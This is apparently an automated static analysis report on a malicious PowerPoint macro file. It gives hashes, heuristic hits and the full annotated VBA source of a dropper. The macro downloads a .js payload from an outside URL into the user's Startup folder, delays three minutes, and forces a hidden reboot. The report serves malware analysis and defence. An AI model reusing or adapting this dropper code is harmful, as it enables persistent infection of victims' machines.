Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf823e55b26dfee8…

MALICIOUS

Office (OOXML)

9.2 KB First seen: 2021-04-01
MD5: 101be948ef3eaf39cf9e0147f0bc9624 SHA-1: af937ae64876f51bc331e2d5786ac2fced92b703 SHA-256: bf823e55b26dfee8060c2fc7ea6955b63f64c9d87728c56df1c2bb6d22232a4c
190 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA. The matched line issues a hidden, forced restart (`shutdown -r -f`) with a 2-second countdown, so detonating this sample will also terminate the analyst's own session — run it only in a disposable VM with snapshots.
    Matched line in script
     Shell "shutdown -r -f -t 02", vbHide
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p111.js"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro (auto_open is the entry point that chains ForceReboot and Download). Caveat: the VBA project is stored at ppt/vbaProject.bin, i.e. a PowerPoint container, and PowerPoint does not run Auto_Open automatically the way Word/Excel do — confirm the actual trigger (e.g. an action setting on a slide element or add-in loading) before assuming execution on open.
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.diamantesviagens.com.br/PPO.js Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2133 bytes
SHA-256: 0801c9132a6ce1a352ba893a64c49c33a1471db27f14610c1c6935629248d059
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"

Option Explicit

#If VBA7 And Win64 Then

Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 'For 64 Bit Systems


    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
    Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#Else


Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long) 'For 32 Bit Systems

    Private Declare Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
    Private Declare Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#End If
' Dropper stage: fetches the remote script and writes it straight into the
' current user's Startup folder, so it is launched at the next logon (which
' ForceReboot provokes). Called from auto_open after ForceReboot.
' No return value; any VBA runtime error falls through to the Err handler.
Public Sub Download()
    On Error GoTo Err
    Dim Auxiliar As Long
    Dim URL As String, CaminhoLocal As String, startupfolder As String
    ' Payload URL (listed under "Embedded URL" above). The content is saved
    ' with a .js name, so it is presumably JScript run by wscript at logon.
    URL = "https://www.diamantesviagens.com.br/PPO.js"
    ' Portuguese "local path". Assigned but never used: the download below
    ' targets startupfolder, not this path. Still useful as an IOC string.
    CaminhoLocal = "C:\Users\Public\pandorinha.zip"
    ' Per-user Startup folder path, built from WScript.Network.UserName
    ' (the CreateObject call flagged as OLE_VBA_CREATEOBJ). Hard-codes the
    ' C:\Users\<name> profile layout; nothing checks the folder exists.
    startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p111.js"

    ' urlmon!URLDownloadToFileA: writes the response directly to the Startup
    ' folder. The HRESULT is stored in Auxiliar but never checked, so a failed
    ' download does not reach the Err handler unless the call itself raises.
    Auxiliar = URLDownloadToFile(0, URL, startupfolder, 0, 0)
   ' (commented-out success message; Portuguese for "Download completed successfully")
   ' MsgBox "Download efetuado com sucesso!"
    Exit Sub
Err:
    ' Only VBA runtime errors land here. Message is Portuguese for
    ' "Error downloading the file".
    MsgBox "Erro no download do arquivo"
End Sub





' Waits ~3 minutes (SleepTest) and then spawns a hidden, forced restart with a
' 2-second countdown. Declared as a Function but returns nothing.
' Called first from auto_open; because Shell returns as soon as shutdown.exe is
' started, the caller still gets to run Download before the machine goes down.
Public Function ForceReboot()
SleepTest
 ' -r reboot, -f force-close applications, -t 02 two-second delay; vbHide
 ' keeps the console window invisible to the user.
 Shell "shutdown -r -f -t 02", vbHide
End Function
 
' Blocks the macro for 180 000 ms (3 minutes) via kernel32!Sleep before the
' reboot is issued. Presumably a delay to outlast automated sandbox runs or
' to put distance between document open and the visible restart — confirm.
' The MsgBox calls are leftover debugging, commented out.
Sub SleepTest()

'MsgBox "Execution is started"
Sleep 180000 'delay in milliseconds
'MsgBox "Execution Resumed"
End Sub


' Macro entry point (flagged as OLE_VBA_AUTO). Order matters: ForceReboot
' sleeps 3 minutes and schedules the restart, then Download drops p111.js into
' the Startup folder during the 2-second countdown, so the dropped script runs
' at the next logon. NOTE(review): this project lives in ppt/vbaProject.bin
' (PowerPoint), where Auto_Open is not fired automatically on open as it is in
' Word/Excel — confirm the real trigger before assuming execution on open.
Sub auto_open()
ForceReboot
Download

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 19456 bytes
SHA-256: f4a0bbeb9d321a83719f4e3e6c7d6ba444bc966bbbf7c33abff85cba953db5c8